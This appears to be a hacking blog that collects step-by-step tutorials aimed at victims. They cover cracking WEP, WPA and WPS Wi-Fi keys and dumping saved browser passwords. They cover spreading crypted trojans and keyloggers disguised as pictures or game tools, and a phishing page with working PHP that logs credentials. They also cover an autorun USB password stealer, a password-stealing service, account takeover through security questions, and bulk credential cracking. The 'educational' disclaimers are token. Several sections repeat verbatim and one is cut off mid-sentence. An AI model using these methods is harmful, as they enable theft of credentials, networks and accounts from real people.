This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.
What you will need:
Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0
type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on
open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap
You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)
NOTES:
Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.
Saturday, 21 March 2015
Hack wifi wep
Setup baxktrack for wi-fi hacking
This guide will show you how to download and setup BackTrack 5 to either boot off of USB, DVD, or dual-boot. Backtrack 5 is a linux build filled with a bunch of useful penetration testing tools, and will be used in the WiFi hacking tutorials as well as hacking PC tutorials.
USB method
using just a USB drive, you can run backtrack on any computer without installing anything.
What you need:
4GB+ USB flash drive
Windows PC
BackTrack 5 ISO file
UNetbootin
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Download UNetbootin from http://unetbootin.sourceforge.net/ for windows and install it.
Plug your USB drive into your PC
Format the USB drive to FAT3 Note: this will delete all files on the flash drive.
Open UNetbootin and choose diskimage
Select the BackTrack 5 ISO file you downloaded.
Set the amount of space you would like to use for persistence in MB
Select your USB drive to create a bootable BackTrack 5
Now when you plug your flash drive into any computer and turn it on, you can boot off the flash drive. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your USB drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
DVD method
using just a DVD, you can run backtrack on any computer with a dvd drive without installing anything.
What you need:
Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.
Now when you insert your DVD into any computer and turn it on, you can boot off the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
Dual-boot method
setup BackTrack 5 to dual boot along side your Windows 7 installation. When you boot up your computer, you'll be able to choose if you want to boot into Windows 7 or boot into BackTrack 5
What you need:
Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.
With the DVD in your drive, reboot and boot of the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
Once your at the BackTrack 5 desktop, you will see an install file on the desktop. Run this and follow the steps until installation is completed. It will ask you for your language, time zone, and how much of your hard drive you'd like to use for BackTrack
Reboot, and you will now have the option to boot into Windows 7 or BackTrack 5
Tuesday, 17 March 2015
Hacking password for gmail and facebook
This tutorial will show you how to obtain all saved passwords on a computer, which may include e-mails and other accounts. This tutorial assumes you have physical access to the victims computer.
Download and install Cain & Able from here: http://www.oxid.it/cain.html
If you don't want to have to download and install software on the victims computer, a USB bootable version is available.
Open Cain & Abel and click on configure
Select the device that has an IP (192.168.1.0 for example) and make sure Don't use promisucous mode is checked. Click ok
On the left under the decoders tab, there should be an IE 7 passwords option. Choose that
Click on the blue + icon
You should now see all saved IE 7 passwords. You can use the other options on the left to see if you can recover any other stored passwords.
If the victim doesn't use IE or this method didn't work for any reason, you can google search stored password recovery and find a bunch of other tools that do similar functions. Also, see the "USB password stealer" tutorial on this website.
Easy to hack anything with virus so why you don't try
Only use this method if the other methods didn't work for you, as this requires a little more work on your part. This method requires sending the victim a virus which will log their keystrokes and/or passwords, and sends them to you. If you don't do this well, its possible your virus can be detected and removed by the persons antivirus software.
This method requires:
A trojan or keylogger of your choice. www.hackforums.net is a good resource for finding this. There are hundreds of different programs you can use
A crypter. Crypting your virus is essential if you don't want your virus detected by an antivirus program. You can use the same link as above to find one, or you can even pay someone else like $5 on those forums to crypt your virus or keylogger for you. If your victim doesn't have antivirus, you may skip this, but it's not recommended.
A binder. Not required but this will be useful if you want to attach your virus to say a picture file. This way your not just sending someone a .exe which will seem more suspicious then if you sent them a legit picture file, which happens to have a virus attached to it. The person would never know. you sent them a virus. Again use google or the above link to find one of these, there are many.
First step is finding the trojan or keylogger of your choice. A trojan essentially is a virus that gives you access to a persons computer, and control/monitor a number of things, almost as if you were sitting at the computer itself. There are many different kinds, each with their own features and functions; most include a keylogger. A keylogger is a type of program or virus that simply monitors every key pressed and saves it into a log, which you can then access. www.hackforums.net is a good resource to find one of these, and its really up to you which you use, the steps will all be the same.
Once you have your trojan server created, you need to have it crypted. This will help prevent your virus from being detected by antivirus. You can either find your own crypter or pay someone a small fee to crypt your virus for you. Search around online for this, as there are many out there.
Once you have a crypted virus, you may now use a binder if you like, to combine your virus with another program or file such as a picture. This is recommended, because an jpeg is a lot less suspicious than a .exe file
Now that everything is ready, send your victim the file! You can trick them and tell them its a cool picture, or host the file on a free host somewhere online and have them download it saying its a cool new song. Your method of getting the file to them is up to you and how creative you can be. Another way is to install it yourself, if you have access to their computer. Just put the file on a flash drive and install it when they aren't around.
Once they're infected, you can use the trojan/keylogger program to monitor their PC. The possibilities from here are practically endless, and mostly depend on what kind of trojan/keylogger you used.
Phishing hacking for hack gmail and facebook
This guide will walk you through making a fake email login page, facebook, or any other service which you can send to someone. Once they log in, you will have their password and they will never know.
What this requires:
A computer with internet
a little cleverness and creativity
First, head over to 000webhost.com and create a free php hosting account. Whatever you make the URL will be what you send the person, so you may want to make it clever or something they might believe like amazingvideos.whatever.com
Once you've got your hosting created, time to make the fake login files. Goto the website of your choice (gmail.com, facebook.com, hotmail.com etc) and right click anywhere in the blank space and choose View Source. This will open the webpages code in a notepad. Select it all and copy it.
Now paste all the code into a notepad and press ctrl+f to search the document for action. Next to action you will see a url in quotes; delete this and replace it with post.php
Save the document as index.htm and make sure if you're saving with notepad, you select all files from the save drop down menu instead of text document
Now open a new notepad, and type in the following code:
<?php
header ('Location: http://facebook.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save this file as post.php and again, make sure you save as all files and not text document.
Now go back to 000webhost.com and upload these 2 files to your hosting.
If everything was done correctly, when you send the person to your link, they will see a fake email login page. When they login, you can see their email and password in usernames.txt which will be created in your host where you uploaded the files. When they login, they will be redirected to the website you filled in.
NOTES: If you want to change where they're redirected to when they log in, change THE WEBSITE YOU PICKED in post.php file to the url of your choice.
Remote data stealer hacking
This popular stealer is back due to popular demand with new modifications and limitations. It decrypts all stored passwords in the internet browser. It works on Windows Vista and Windows 7 machines and it is in beta and only works on Chrome, Firefox, and IE. It is done in Java applet so they do need to run the applet for this to work. Luckily, the average user does not have much knowledge of computers so a little of social engineering should do the trick.
Basically, you register your email, pick a theme and it will give you a URL. Send the URL to a slave, use a bit of social engineering to get them to click on the link and run the applet. Once the applet is ran, they will get a fake error message and the decrypted stored passwords and cookie files will be sent to your email.
It is 100% FUD. All the decryption is done through the applet so it is not JDB and no files are downloaded to the slave's computer hence wont trigger Anti Viruses.
Go to: http://stealer.ambesty.com/
Read the instructions
Enter your email, click Signup/Login.
It will generate a URL per theme, send your slave the URL.
If all goes well, you should receive an email in your inbox with the decrypted data.
Monday, 16 March 2015
Social hacker engineering
This is probably the easiest method to get access to an e-mail account, and it really isn't hacking at all as much as it is playing off the stupidity of others. This will work for most e-mail services, such as gmail, yahoo, hotmail, etc
Here are a list of websites that will help you gather information you might need for this tutorial:
http://www.spokeo.com/
http://www.pipl.com/
http://www.zabasearch.com/
http://com.lullar.com/
http://www.emailfinder.com/
http://www.zoominfo.com/
The first step, is to obtain the victims e-mail address. This can be as easy as asking them for it in a non-suspicious way. The websites listed above can help you obtain their e-mail as well. Once you have their e-mail address, proceed to step 2.
For this example, we're going to presume or victim is using gmail, but the steps are about the same for any other service. Go to gmail, click I cannot access my account. For other e-mail services, it may be i forgot my password. What we're trying to do is get access to the security questions. For gmail it wont ask you the questions right away, it will send a password reset e-mail to the alternate e-mail account. For gmail, it will only ask you the security questions if the person hasn't logged into their account 24 hours after you submit a i cannot access my account request.
Once you're asked the security questions, the only thing in between you and their e-mail is the answers to said questions. Most questions are pretty easy to answer if you know the person. if you dont know them, just find out the answers. For example, one security question is What is the name of your first dog?. If you know the person, this could be an easy answer. If you don't, you could try bringing it up smoothly in a conversation, or by asking people close to the victim such as family or friends.
Once you've correctly answered the questions, you will be able to reset their password and gain access. Congrats :)
Most likely the person will end up resetting their password once they realized what has happened. If you want to leave a way for you to get back in, change their alternate e-mail. If they have an alternate e-mail as victim@yahoo.com, make an e-mail account with the same name on another service such as yahoo, so you own an email account victim@hotmail.com and replace their alternate email with this. This way, they most likely wont notice their alternate was changed, and you can just have a password reset request sent to your new email account, allowing you to regain access :)
As always, this is for educational purposes only, and is illegal to gain access to someone elses e-mail account. Only attempt this on your own accounts. Use at your own risk.
Account hacker
This tutorial will cover how to gather and crack logins for popular websites, such as Minecraft, photobucket, porn sites, facebook, and more. Note: this tutorial won't show you how to crack a specific persons account, but instead will crack random peoples accounts. For specific target cracks, please view one of the other tutorials. NOTE: Not 100% of the logins will work. This is due to someone possibly hacking them before you and them being used too many times. Just simply try another login till you get a working one.
What you need:
This tutorial assumes you're using a Windows based PC
Athena v1.6 (google search this program for the download)
Apex Crack by Buddah (google search this program for the download)
Proxy Finder Enterprise Edition (google search or torrent a cracked version of this program. This app contains a torrent tutorial under Misc. Hacks)
Raptor 3 (google search this program for the download)
All of the above programs can be found in the forums at http://hackershandbook.org/forum/tools-and-programs/cracking-tools-apex-...
Open Athena
Click start. The longer you let this run, the more websites and logins it will gather. You will get a few thousand in a few minutes. In the Athena folder, you will notice it created some text files. the logins.txt file contains direct login links you can copy and paste into firefox URL bar to login directly. If you're just looking for a porn login, this may be your best bet and you can skip all further steps.
Click stop when you're done.
Open Raptor 3
Click on Generators in the bottom left corner
Click Pass Leecher
Right click in the white space and click on Add File or simply click the add file button
Select the logins.txt file that you generated from Athena
Click on Leech and then save the file by going to File > Save As..
Open Proxy finder
Click on Find
When it's finished, press OK and then Save the proxy list.
Open Apex and click on Site Settings
Select the website you want to crack login and passwords for in the drop down list.
Click on Proxy Lists
Click on Load and select the proxy list file you saved from Proxy Finder.
Click on Crack Lists
Click on Load and select the file you saved from raptor
Click Start. This will begin to crack the logins using the proxies in the list and save them to a txt file in the Apex folder. This is where your cracked accounts and passwords will be.
Once it finishes going through your list of proxies, you'll notice the on the right the Valid Proxies box. Click on send. This will make it so the cracker will only run through the proxies that work, thus making the cracking process substantially faster.
USB stealer data hacking
This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. If you're looking for a super tiny, super discreet flash drive, we recommend SanDisk Cruzer Fit CZ33 64GB USB 2.0 Low-Profile Flash Drive- SDCZ33-064G-B35
open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
copy the autorun and launch file to your USB
go to http://www.nirsoft.net/ and download the programs named in step 2
extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB
click on the option perform a virus scan
(this is an exemple, if you want it to say something else go to the autorun file and change it ;) )
go to my computer---> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer
Create keylogger
A keylogger is a program that runs in the background on someones computer that logs every key they press, and then sends the log of all the pressed keys to the attacker. This essentially allows you the ability to collect all the usernames and passwords typed in.
What you need:
Vulcan logger - http://vulcantools.net/?mod=freetools&tool=Vulcan%20Logger
A new e-mail address specifically for keylogging
After you downloaded the program, open it up and you should see the builder. Input YOUR email username & password into the boxes. The reason we are doing this is because the keylogger will log INTO your email, then email yourself the logs. I recommend making a new email specifically for keylogging.
Select what email provider you are using here. If you are using gmail, select the first provider, if you are using yahoo, select the second provider, if you are using hotmail or live, select the third option.
Input the subject of the message you will receive every time you receive a keylog. Most people put "Facebook Logger" or something similar.
I recommend checking both of these boxes. The computer info will send the slave's IP address and their computer name. The screenshot will send a picture of the slave's screen whenever the log was sent.
This is the time in between the logs. I usually recommend 5-15 minutes.
At this point I suggest you click Test Email and make sure everything is working fine.
This is what the Icon of the output file will be. It will ONLY take in .ico's. If you do not have any, I suggest either downloading them online, or creating your own. At http://convertico.com/ you can upload a PNG file and it will convert it to ICO for you.
Some anti-viruses will detect an icon if it has been used before for malware, so I recommend getting some more obscure icons that have not been used before. After you locate the .ico it should appear in the box located to the right of the browse button.
Click the Extra Options Tab at the top of the builder.
The add to startup option will make the slave file go on startup on the slave's computer, so whenever he reboots his computer, he will become keylogged again. The melt option will make the file go hidden when it is first run. I usually recommend that you check both of them.
This option will allow you to display an error message when the file is first run by the slave. Common messages are "This file is not compatible with your computer."
The Use Downloader function will download and execute a file on the first run of the slave file. You can do this if you want it to execute many different viruses, its a better alternative to binding. Make sure you put a direct link to the file.
The Website Visitor function will automatically visit the website on run. It will pop up in the default web browser.
I strongly recommend that you check both of these functions. They will decrease the detection rate and make your logger more secure from whalers. I also recommend that you click Generate Key a few times to get a unique key. This is generating an encryption key to keep all of your information secure.
Now click on the Assembly & Build Tab.
Click the "Randomly Generate" button. Now you can change the assembly to whatever you want it to say. For example, if you want to disguise this as a runescape product, you should change the company to "Jagex LTD." and the Product to "Runescape" and the Copyright to "Jagex LTD. All Rights Reserved". I do not suggest changing the version and File Version.
Below is an example:
This is a file pumper, it will increase the size of the output file. You should keep this at 0 unless you want to increase the size of your slave file.
Change the File Name to whatever you are disguising the file as, for example you can change it to "Runescape Pin Generator". Now click build. Wait a bit and it should give you the following message:
All you have to do now is go to the folder where your builder is located and you should notice your slave file. You
Create keylogger
A keylogger is a program that runs in the background on someones computer that logs every key they press, and then sends the log of all the pressed keys to the attacker. This essentially allows you the ability to collect all the usernames and passwords typed in.
What you need:
Vulcan logger - http://vulcantools.net/?mod=freetools&tool=Vulcan%20Logger
A new e-mail address specifically for keylogging
After you downloaded the program, open it up and you should see the builder. Input YOUR email username & password into the boxes. The reason we are doing this is because the keylogger will log INTO your email, then email yourself the logs. I recommend making a new email specifically for keylogging.
Select what email provider you are using here. If you are using gmail, select the first provider, if you are using yahoo, select the second provider, if you are using hotmail or live, select the third option.
Input the subject of the message you will receive every time you receive a keylog. Most people put "Facebook Logger" or something similar.
I recommend checking both of these boxes. The computer info will send the slave's IP address and their computer name. The screenshot will send a picture of the slave's screen whenever the log was sent.
This is the time in between the logs. I usually recommend 5-15 minutes.
At this point I suggest you click Test Email and make sure everything is working fine.
This is what the Icon of the output file will be. It will ONLY take in .ico's. If you do not have any, I suggest either downloading them online, or creating your own. At http://convertico.com/ you can upload a PNG file and it will convert it to ICO for you.
Some anti-viruses will detect an icon if it has been used before for malware, so I recommend getting some more obscure icons that have not been used before. After you locate the .ico it should appear in the box located to the right of the browse button.
Click the Extra Options Tab at the top of the builder.
The add to startup option will make the slave file go on startup on the slave's computer, so whenever he reboots his computer, he will become keylogged again. The melt option will make the file go hidden when it is first run. I usually recommend that you check both of them.
This option will allow you to display an error message when the file is first run by the slave. Common messages are "This file is not compatible with your computer."
The Use Downloader function will download and execute a file on the first run of the slave file. You can do this if you want it to execute many different viruses, its a better alternative to binding. Make sure you put a direct link to the file.
The Website Visitor function will automatically visit the website on run. It will pop up in the default web browser.
I strongly recommend that you check both of these functions. They will decrease the detection rate and make your logger more secure from whalers. I also recommend that you click Generate Key a few times to get a unique key. This is generating an encryption key to keep all of your information secure.
Now click on the Assembly & Build Tab.
Click the "Randomly Generate" button. Now you can change the assembly to whatever you want it to say. For example, if you want to disguise this as a runescape product, you should change the company to "Jagex LTD." and the Product to "Runescape" and the Copyright to "Jagex LTD. All Rights Reserved". I do not suggest changing the version and File Version.
Below is an example:
This is a file pumper, it will increase the size of the output file. You should keep this at 0 unless you want to increase the size of your slave file.
Change the File Name to whatever you are disguising the file as, for example you can change it to "Runescape Pin Generator". Now click build. Wait a bit and it should give you the following message:
All you have to do now is go to the folder where your builder is located and you should notice your slave file. You
Crack wps
This tutorial was created by one of our members, bateman. THIS WILL ONLY WORK IF WPS IS ENABLED ON THE ROUTER. (it is on most routers)
Boot up Backtrack 5, preferrably the latest version.
If you aren't using the latest backtrack, you'll need to download reaver. You can do this by connecting to the internet and typing the following in the command terminal: apt-get install reaver
Now you need to put your wireless card into monitor mode. On most PC's, your wireless card device name will be wlan0 so thats what we'll use for this tutorial. Type the following into the terminal: airmon-ng start wlan0
Next you need the mac address of the router. to get this type the following command: airodump-ng wlan0
You should now see a list of routers in range and their mac address, along with channel etc. Copy the MAC address
Next, you need to start up reaver. You can do this by simply typing reaver in the terminal and pressing enter. This will show you all the available commands you can use in reaver, so feel free to play with the options.
Enter the following command: reaver -i mon0 -b MACADDRESSHERE -vv
Now let the program do its stuff, it can take as long 40+ hours to crack a weak signal. But usually less than 24 hours. if you need to use your pc in the mean time. you can save the work done by reaver by pressing: CTRL+ALT+C
note: this does not seem to work on BT(British telecom) router's even if wps is enabled. This is for educational purposes only. UPDATE: the Reaver program is now included in Backtrack 5R2
Crack wpa
This chapter will teach you how to crack the WPA of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial. Cracking WPA isn't 100% going to work everytime. It depends on how easy their WPA password is, and how good your dictionary file is.
What you will need:
Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Dictionary file (backtrack comes with a couple)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -0 5 -a (enter bssid here) wlan0
type: aircrack-ng wpahack.cap -w (path to a dictionary file)
You should now see it attempting to crack the WPA key. This could take awhile depending on how big the dictionary file is, and how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WPA on the screen :)
NOTES:
This won't work if you dont get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not.
Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, the longer it will take.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.
Crack wap wi-fi
This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.
What you will need:
Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0
type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on
open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap
You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)
NOTES:
Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.
Setup back track 5
This guide will show you how to download and setup BackTrack 5 to either boot off of USB, DVD, or dual-boot. Backtrack 5 is a linux build filled with a bunch of useful penetration testing tools, and will be used in the WiFi hacking tutorials as well as hacking PC tutorials.
USB method
using just a USB drive, you can run backtrack on any computer without installing anything.
What you need:
4GB+ USB flash drive
Windows PC
BackTrack 5 ISO file
UNetbootin
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Download UNetbootin from http://unetbootin.sourceforge.net/ for windows and install it.
Plug your USB drive into your PC
Format the USB drive to FAT3 Note: this will delete all files on the flash drive.
Open UNetbootin and choose diskimage
Select the BackTrack 5 ISO file you downloaded.
Set the amount of space you would like to use for persistence in MB
Select your USB drive to create a bootable BackTrack 5
Now when you plug your flash drive into any computer and turn it on, you can boot off the flash drive. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your USB drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
DVD method
using just a DVD, you can run backtrack on any computer with a dvd drive without installing anything.
What you need:
Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.
Now when you insert your DVD into any computer and turn it on, you can boot off the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
Dual-boot method
setup BackTrack 5 to dual boot along side your Windows 7 installation. When you boot up your computer, you'll be able to choose if you want to boot into Windows 7 or boot into BackTrack 5
What you need:
Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.
With the DVD in your drive, reboot and boot of the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
Once your at the BackTrack 5 desktop, you will see an install file on the desktop. Run this and follow the steps until installation is completed. It will ask you for your language, time zone, and how much of your hard drive you'd like to use for BackTrack
Reboot, and you will now have the option to boot into Windows 7 or BackTrack 5